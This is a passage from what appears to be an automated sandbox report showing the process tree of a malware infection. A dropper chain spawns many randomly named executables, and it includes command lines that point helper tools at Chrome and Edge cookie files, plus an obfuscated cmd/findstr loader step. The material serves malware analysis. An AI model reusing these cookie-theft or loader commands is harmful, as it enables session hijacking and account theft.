                                                                                                                                                          PID:356
                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                          1⤵
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:1712
                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1860
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2664
                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:4480
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4904
                                                                                                                                                              • C:\Users\Admin\Documents\a8qqB7XZAe2zzNW6dtIhbcwj.exe
                                                                                                                                                                "C:\Users\Admin\Documents\a8qqB7XZAe2zzNW6dtIhbcwj.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4496
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 668
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:1852
                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                  PID:5364
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5384
                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5432
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 656
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5560
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS447CE875\karotima_1.exe
                                                                                                                                                                      karotima_1.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5184
                                                                                                                                                                        • C:\Users\Admin\Documents\wGjaMNnLJTWCyW_99tZbbweP.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\wGjaMNnLJTWCyW_99tZbbweP.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:6180
                                                                                                                                                                            • C:\Users\Admin\Documents\wGjaMNnLJTWCyW_99tZbbweP.exe
                                                                                                                                                                              C:\Users\Admin\Documents\wGjaMNnLJTWCyW_99tZbbweP.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:7116
                                                                                                                                                                            • C:\Users\Admin\Documents\AMgF8yqJrRWa35hpYlCzdak_.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\AMgF8yqJrRWa35hpYlCzdak_.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:6196
                                                                                                                                                                                • C:\Users\Admin\Documents\AMgF8yqJrRWa35hpYlCzdak_.exe
                                                                                                                                                                                  C:\Users\Admin\Documents\AMgF8yqJrRWa35hpYlCzdak_.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:7148
                                                                                                                                                                                • C:\Users\Admin\Documents\O35ddKqinv2lyur3IVNwJvXL.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\O35ddKqinv2lyur3IVNwJvXL.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:6348
                                                                                                                                                                                    • C:\Users\Admin\Documents\O35ddKqinv2lyur3IVNwJvXL.exe
                                                                                                                                                                                      C:\Users\Admin\Documents\O35ddKqinv2lyur3IVNwJvXL.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:7096
                                                                                                                                                                                      • C:\Users\Admin\Documents\O35ddKqinv2lyur3IVNwJvXL.exe
                                                                                                                                                                                        C:\Users\Admin\Documents\O35ddKqinv2lyur3IVNwJvXL.exe
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:6460
                                                                                                                                                                                      • C:\Users\Admin\Documents\TwVzXYBkgn0nMaWWUtaIUaMN.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\TwVzXYBkgn0nMaWWUtaIUaMN.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:6500
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6224
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:6484
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:7216
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:7580
                                                                                                                                                                                                • C:\Users\Admin\Documents\VZE3eCa5n7MWAdHRVxzpQmOu.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\VZE3eCa5n7MWAdHRVxzpQmOu.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:6600
                                                                                                                                                                                                  • C:\Users\Admin\Documents\vyi1Iqug5yjGJHZ9WYqkrW0X.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\vyi1Iqug5yjGJHZ9WYqkrW0X.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:6692
                                                                                                                                                                                                      • C:\Users\Admin\Documents\vyi1Iqug5yjGJHZ9WYqkrW0X.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\vyi1Iqug5yjGJHZ9WYqkrW0X.exe"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2184
                                                                                                                                                                                                      • C:\Users\Admin\Documents\9R9b5wz80JwrBmc9e2FigCiJ.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\9R9b5wz80JwrBmc9e2FigCiJ.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:6660
                                                                                                                                                                                                        • C:\Users\Admin\Documents\oNHN7P8LWP0Vb0qFDmhp5auY.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\oNHN7P8LWP0Vb0qFDmhp5auY.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:6792
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:6344
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8C80A1D5\setup_install.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS8C80A1D5\setup_install.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5572
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:6332
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8C80A1D5\karotima_2.exe
                                                                                                                                                                                                                          karotima_2.exe
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:6916
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8C80A1D5\karotima_2.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zS8C80A1D5\karotima_2.exe" -a
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:4648
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:6740
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8C80A1D5\karotima_1.exe
                                                                                                                                                                                                                                karotima_1.exe
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:3520
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\OL78MyhzwuOsRcM3dMhXWnFC.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\OL78MyhzwuOsRcM3dMhXWnFC.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:7356
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\OL78MyhzwuOsRcM3dMhXWnFC.exe
                                                                                                                                                                                                                                        C:\Users\Admin\Documents\OL78MyhzwuOsRcM3dMhXWnFC.exe
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:7736
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Ql85muTX9_8Onl4B3bddlUPe.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\Ql85muTX9_8Onl4B3bddlUPe.exe"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:7448
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:8108
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                  PID:7952
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                    findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:7588
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\Acre.exe.com
                                                                                                                                                                                                                                                      Acre.exe.com k
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:5148
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                        PID:5824
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\psHjZehbsTl5lC2zXBiZ9qXx.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\psHjZehbsTl5lC2zXBiZ9qXx.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:7496
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\psHjZehbsTl5lC2zXBiZ9qXx.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\psHjZehbsTl5lC2zXBiZ9qXx.exe
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:8028
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\psHjZehbsTl5lC2zXBiZ9qXx.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\psHjZehbsTl5lC2zXBiZ9qXx.exe
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:7824
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\0NYLvHgySrZUxsLt41e6smKg.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\0NYLvHgySrZUxsLt41e6smKg.exe"
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:7344
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:7284
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                              PID:1860
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:8180
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:5140
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:7968
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\iqpa5DaWJTrdWx4RY0_uNgV2.exe
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:7376
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\LFgl8YVz0Xj3B9ggS9ZYw0ld.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\LFgl8YVz0Xj3B9ggS9ZYw0ld.exe"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:7276
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\LFgl8YVz0Xj3B9ggS9ZYw0ld.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\LFgl8YVz0Xj3B9ggS9ZYw0ld.exe
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                          PID:7960
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\LFgl8YVz0Xj3B9ggS9ZYw0ld.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\LFgl8YVz0Xj3B9ggS9ZYw0ld.exe
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                            PID:7784
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\4xohg3kMnjLAsea6w865VzPS.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\4xohg3kMnjLAsea6w865VzPS.exe"
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:7268
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\4xohg3kMnjLAsea6w865VzPS.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\4xohg3kMnjLAsea6w865VzPS.exe
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                PID:7944
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\LuRc2vw66EQ23MygkhO_ki5E.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\LuRc2vw66EQ23MygkhO_ki5E.exe"
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:7256
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\Es5Su0ToYnxNRz5ARTKg9sAW.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\Es5Su0ToYnxNRz5ARTKg9sAW.exe"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:7868
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\Es5Su0ToYnxNRz5ARTKg9sAW.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\Es5Su0ToYnxNRz5ARTKg9sAW.exe
                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                      PID:7312
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\EzupCnAR0pmsztVkk2AWMFWO.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\EzupCnAR0pmsztVkk2AWMFWO.exe"
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                      PID:8156
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                          PID:7232
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                            PID:7924
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                              PID:6520
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                PID:8276
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\bbUIi8qBKuNWjPJ3cQ__EO9G.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\bbUIi8qBKuNWjPJ3cQ__EO9G.exe"
                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                PID:2672
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1314914.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1314914.exe"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                    PID:7644
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2483471.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2483471.exe"
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                      PID:7668
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\coNodlpwoQBOi9myo1cbLpTm.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\coNodlpwoQBOi9myo1cbLpTm.exe"
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                      PID:7476
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\nfL9LUMcNrEZ9DDfYW0VqSTB.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\nfL9LUMcNrEZ9DDfYW0VqSTB.exe"
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                        PID:7620
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\3YMwHickbnxGvthnFdth1daE.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\3YMwHickbnxGvthnFdth1daE.exe"
                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                          PID:7720
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\3YMwHickbnxGvthnFdth1daE.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\3YMwHickbnxGvthnFdth1daE.exe"
                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                              PID:7560
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\v2j6gaX5NpE9F1DFWT03kuvB.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\v2j6gaX5NpE9F1DFWT03kuvB.exe"
                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                              PID:6256
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\oH7hcyKVrspjotJ69rZUrl_B.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\oH7hcyKVrspjotJ69rZUrl_B.exe"
                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                PID:3880
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\56TrKfSHk6xgj1XU8iP7NH2N.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\56TrKfSHk6xgj1XU8iP7NH2N.exe"
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                  PID:7928
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                      PID:592
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0527F776\setup_install.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS0527F776\setup_install.exe"
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                          PID:5744
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                              PID:188
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0527F776\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                karotima_2.exe
                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                  PID:8040
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0527F776\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS0527F776\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                      PID:5980
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                    PID:3032
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0527F776\karotima_1.exe
                                                                                                                                                                                                                                                                                                                                      karotima_1.exe
                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                        PID:7020
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\_pQ859KmTwskPwUri1OA2qIO.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\_pQ859KmTwskPwUri1OA2qIO.exe"
                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                            PID:7352
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\_pQ859KmTwskPwUri1OA2qIO.exe
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\_pQ859KmTwskPwUri1OA2qIO.exe
                                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                                PID:8940
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\62Q5674CZMK6Iyznnn8IfqFn.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\62Q5674CZMK6Iyznnn8IfqFn.exe"
                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                PID:7316
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\vQzH0MljYZKDARkJ3BQwUIGK.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\vQzH0MljYZKDARkJ3BQwUIGK.exe"
                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7196
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\vQzH0MljYZKDARkJ3BQwUIGK.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\vQzH0MljYZKDARkJ3BQwUIGK.exe
                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                      PID:9000
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\bpN8e8u9jv4OcUDAcA2BcEZn.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\bpN8e8u9jv4OcUDAcA2BcEZn.exe"
                                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6700
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\HyQjiA1CwRTjqW_0uFkToDxt.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\HyQjiA1CwRTjqW_0uFkToDxt.exe"
                                                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6904
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\iHKNR7JvE4pbFKpvDRoEHcf4.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\iHKNR7JvE4pbFKpvDRoEHcf4.exe"
                                                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8132
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\91BWGIIwe9VtJG6WQR6bjZUR.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\91BWGIIwe9VtJG6WQR6bjZUR.exe"
                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5476
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\VLjjkHzD5mVEl_CB_r65hTSf.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\VLjjkHzD5mVEl_CB_r65hTSf.exe"
                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                              PID:7424
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\fBK52qbTxOgw8hVG2AD6c57x.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\fBK52qbTxOgw8hVG2AD6c57x.exe"
